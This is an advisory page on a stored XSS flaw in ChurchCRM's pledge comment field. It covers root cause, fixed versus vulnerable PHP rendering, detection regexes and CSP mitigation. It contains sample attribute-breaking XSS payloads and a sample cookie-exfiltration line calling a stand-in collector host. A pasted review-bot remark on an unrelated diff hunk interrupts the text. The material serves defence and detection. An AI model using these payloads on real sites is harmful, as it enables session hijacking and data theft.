CVE-2026-40483 Overview
ChurchCRM, an open-source church management system, contains a stored Cross-Site Scripting (XSS) vulnerability in the Pledge Editor component. In versions prior to 7.2.0, the application renders donation comment values directly into HTML input value attributes without proper escaping via htmlspecialchars(). This allows an authenticated user with Finance permissions to inject HTML attribute-breaking characters and event handlers into the comment field. The malicious payload is stored in the database and executes in the browser of any user who subsequently opens the pledge record for editing.
Critical Impact
An authenticated attacker with Finance permissions can execute arbitrary JavaScript in the browser of any other ChurchCRM user who opens the poisoned pledge record, in that user's authenticated session context. Typical consequences are session hijacking where the session cookie is readable by script (not HttpOnly), credential theft via injected forms or keystroke capture, and actions performed through the victim's session; even with HttpOnly cookies, the injected script can issue same-origin requests as the victim.
Affected Products
- ChurchCRM versions prior to 7.2.0
- ChurchCRM Pledge Editor component (src/PledgeEditor.php)
Discovery Timeline
- 2026-04-18 - CVE-2026-40483 published to NVD
- 2026-04-20 - Last updated in NVD database
Technical Details for CVE-2026-40483
Vulnerability Analysis
This vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). The core issue lies in the Pledge Editor's handling of user-supplied comment data when rendering HTML forms. When a user with Finance permissions creates or edits a pledge record, the comment field value is inserted directly into an HTML input element's value attribute without proper output encoding.
Because the value is never passed through htmlspecialchars() or an equivalent attribute-context encoder, a double quote (") in the comment terminates the value attribute, and the remainder of the comment is parsed as further attributes on the same input element. The attacker can therefore add event handler attributes such as onfocus, onmouseover or onclick; paired with autofocus, an onfocus handler fires as soon as the editor loads, with no victim interaction. No <script> tag is needed, which matters for detection: signatures that look only for script tags will miss this payload class.
Root Cause
The root cause is improper output encoding in the src/PledgeEditor.php file. User-controlled input from the comment field is echoed back into HTML without being processed through PHP's htmlspecialchars() function or similar encoding mechanisms. This violates the security principle of always encoding output based on the context in which it is rendered.
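The following is an added illustration of the attribute-context encoding bug described above, placed beside its hardened form. It is not ChurchCRM's code; the function names, the field name and the sample comment are assumptions constructed for the demonstration.

```php
<?php
// Added example: the vulnerable rendering pattern next to the fixed one.
// Function and field names are assumptions for illustration, not the actual
// code in ChurchCRM's src/PledgeEditor.php.

declare(strict_types=1);

/**
 * Vulnerable pattern: the stored comment is concatenated straight into the
 * value="" attribute. A double quote inside the comment closes the attribute
 * early, and whatever follows is parsed as new attributes on the <input>.
 */
function renderCommentInputVulnerable(string $comment): string
{
    return '<input type="text" name="Comment" value="' . $comment . '">';
}

/**
 * Hardened pattern: encode for the HTML attribute context first.
 * ENT_QUOTES encodes both " and ' (before PHP 8.1 the default flags left
 * single quotes alone, which matters for single-quoted attributes);
 * ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
 */
function renderCommentInputFixed(string $comment): string
{
    $safe = htmlspecialchars($comment, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="Comment" value="' . $safe . '">';
}

// Constructed sample input: a comment that closes the value attribute and
// appends an event handler, the shape of payload the advisory describes.
// The template's own closing quote completes the injected onfocus attribute.
$storedComment = 'Thanks!" autofocus onfocus="alert(document.domain)';

echo "Vulnerable markup:\n", renderCommentInputVulnerable($storedComment), "\n\n";
echo "Fixed markup:\n", renderCommentInputFixed($storedComment), "\n";
```

Run with `php example.php`. In the vulnerable output the stored quote ends the value at `Thanks!` and `autofocus onfocus="…"` become real attributes that the browser honours when the editor loads; in the fixed output every quote is rendered as `&quot;`, so the whole comment stays inside the value attribute and is displayed literally. The same `htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')` call is the right encoder for any value written into a double- or single-quoted HTML attribute; it is not sufficient for values placed inside a `<script>` block or a URL, which need their own context-specific encoding.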
Attack Vector
The attack requires network access to the ChurchCRM instance and an authenticated session with Finance permissions. The attacker saves a pledge whose comment contains an attribute-breaking quote followed by an event handler attribute carrying JavaScript. Once stored, the payload runs in the browser of any user who subsequently opens that pledge record in the Pledge Editor, in that user's session context.
Example attack flow:
- Attacker with Finance permissions creates a pledge with a malicious comment
- Comment contains attribute-breaking characters and event handlers
- Payload is stored in the database
- Victim user opens the pledge for editing
- Malicious JavaScript executes in the victim's browser session
use ChurchCRM\model\ChurchCRM\Family;
use ChurchCRM\model\ChurchCRM\FamilyQuery;
use ChurchCRM\model\ChurchCRM\Pledge;
+use ChurchCRM\model\ChurchCRM\PledgeQuery;
use ChurchCRM\Utils\FiscalYearUtils;
use ChurchCRM\Utils\FunctionsUtils;
use ChurchCRM\Utils\InputUtils;
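Review bot: the only visible change in this hunk is the added `use ChurchCRM\model\ChurchCRM\PledgeQuery;` import at the fourth line; none of the shown lines touch how the comment value is written into the input's value attribute, so the excerpt does not demonstrate the encoding fix the advisory describes, and whether the new import is actually used cannot be judged from these lines. Include the hunk that changes the value-attribute output (the htmlspecialchars() call on the comment) so the fix itself is reviewable, and drop the import if nothing in the file references PledgeQuery.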
Source: GitHub Commit Changes
Detection Methods for CVE-2026-40483
Indicators of Compromise
- Pledge comment entries in which a double or single quote is followed by an event handler attribute (for example " onfocus=, ' onmouseover=). Note that a lone ', &, < or > is a weak indicator on its own: apostrophes in names and amounts such as "< $100" are common in legitimate comments.
- Pledge comments containing JavaScript event handler attributes such as onclick, onerror, onfocus or onmouseover, or the autofocus attribute, which has no legitimate reason to appear in a comment
- Database entries in pledge tables with embedded script tags, javascript: URLs or entity- or percent-encoded JavaScript
- User reports of unexpected browser behavior when viewing pledge records
Detection Strategies
- Review the ChurchCRM database pledge tables for comments matching suspicious patterns: a quote character followed by an on*= attribute (the pattern this CVE's payload actually needs), <script, javascript:, or standalone HTML event attributes. A scan that checks only for <script will miss attribute-breaking payloads entirely.
- Implement Web Application Firewall (WAF) rules to detect XSS payloads in form submissions targeting pledge-related endpoints
- Monitor application logs for unusual activity from users with Finance permissions
- Deploy a Content-Security-Policy-Report-Only header with a reporting endpoint: it does not block anything, but every inline event handler that fires is reported, which surfaces both the attack and any legitimate inline scripts that a later enforcing policy would break
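As an added example of the database review suggested above, the script below scans comment values for the pattern this CVE's payload actually needs (a quote followed by an on*= attribute) as well as the more familiar script-tag and javascript: signatures. It is not part of ChurchCRM; the table rows are constructed sample data and the column names are assumptions, not the project's schema.

```php
<?php
// Added example: offline triage of pledge comments for XSS payloads.
// The rows below are constructed sample data; 'id' and 'comment' are assumed
// column names standing in for a SELECT over the real pledge table.

declare(strict_types=1);

/**
 * Patterns, most specific first. The first one is the important one for this
 * CVE: an attribute-breaking payload needs only a quote followed by an on*=
 * handler, so a scan for "<script" alone misses exactly this payload class.
 * The last pattern is the noisiest and is kept as a catch-all.
 */
const XSS_PATTERNS = [
    'attribute breakout + event handler' => '/["\'][^"\'<>]*\bon[a-z]+\s*=/i',
    'script tag'                         => '/<\s*script\b/i',
    'javascript: URL'                    => '/javascript\s*:/i',
    'inline event handler'               => '/\bon[a-z]+\s*=\s*["\']?[^"\'>\s]/i',
];

/**
 * Return the rows whose comment matches any pattern, tagged with the first
 * matching pattern's name. A plain apostrophe, ampersand or less-than sign is
 * not flagged on its own: "O'Brien" or "< $100" are normal comment content.
 *
 * @param array<int, array{id: int, comment: string}> $rows
 * @return array<int, array{id: int, reason: string, comment: string}>
 */
function findSuspiciousComments(array $rows): array
{
    $hits = [];
    foreach ($rows as $row) {
        foreach (XSS_PATTERNS as $label => $regex) {
            if (preg_match($regex, $row['comment']) === 1) {
                $hits[] = ['id' => $row['id'], 'reason' => $label, 'comment' => $row['comment']];
                break; // one reason per row is enough for triage
            }
        }
    }
    return $hits;
}

// Constructed sample rows: two benign comments with special characters,
// three payloads of different shapes.
$rows = [
    ['id' => 101, 'comment' => "Memorial gift for the O'Brien family"],
    ['id' => 102, 'comment' => 'Split pledge, each part < $100 & paid by cheque'],
    ['id' => 103, 'comment' => '" autofocus onfocus="alert(document.domain)'],
    ['id' => 104, 'comment' => "<script>fetch('//collector.example/' + document.cookie)</script>"],
    ['id' => 105, 'comment' => 'See javascript:alert(1) for details'],
];

foreach (findSuspiciousComments($rows) as $hit) {
    // Plain-text CLI output only; never echo these values back into HTML.
    printf("pledge %d flagged (%s): %s\n", $hit['id'], $hit['reason'], $hit['comment']);
}
```

Run with `php scan.php`; rows 103, 104 and 105 are reported, each with the first pattern that matched, while 101 and 102 are left alone despite containing `'`, `<` and `&`. In production, replace `$rows` with the result of a parameterised `SELECT` over the pledge table and treat every hit as a record to be inspected and cleaned in the database, not merely re-rendered, since the stored value remains dangerous for any other page that might output it without encoding.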
Monitoring Recommendations
- Enable detailed logging for all pledge creation and modification events
- Configure alerts for database entries containing common XSS patterns
- Implement CSP headers with a report-uri directive (or the newer report-to directive, adding report-uri as well for browsers that do not yet support it) so that attempted inline script execution is reported to an endpoint you monitor
- Regularly audit user accounts with Finance permissions for suspicious activity
How to Mitigate CVE-2026-40483
Immediate Actions Required
- Upgrade ChurchCRM to version 7.2.0 or later immediately
- Audit existing pledge records in the database for any malicious payloads
- Review Finance permission assignments and remove unnecessary access
- Implement Content Security Policy headers to reduce XSS impact
Patch Information
ChurchCRM has addressed this vulnerability in version 7.2.0. The fix ensures proper HTML encoding of user-supplied values before rendering them in HTML contexts. For detailed patch information, refer to the GitHub Security Advisory GHSA-wjmf-w8gj-rx7g and the related pull request.
Workarounds
- If an immediate upgrade is not possible, patch the pledge comment output in src/PledgeEditor.php locally by wrapping the value with htmlspecialchars($comment, ENT_QUOTES, 'UTF-8') before it is written into the value attribute; this local change is superseded by the 7.2.0 upgrade and must not be treated as a substitute for it
- Restrict Finance permissions to only trusted administrator accounts until the patch is applied
- Implement a WAF rule to block requests containing XSS patterns in pledge form fields, as a stopgap only: attribute-breaking payloads are short and easily re-encoded, so signature-based blocking is routinely bypassed
- Deploy CSP headers whose script-src omits 'unsafe-inline', which causes the browser to refuse inline event handlers such as the onfocus payload in this CVE. Roll the policy out first as Content-Security-Policy-Report-Only and review the reports: a policy without 'unsafe-inline' also blocks any legitimate inline scripts the application relies on, so enforce it only once the reports show no breakage.
# Example: Add CSP header in Apache configuration (requires mod_headers)
# Add to .htaccess or the virtual host configuration; start with
# Content-Security-Policy-Report-Only and switch to the enforcing header
# once violation reports show no legitimate inline scripts are affected
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none';"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

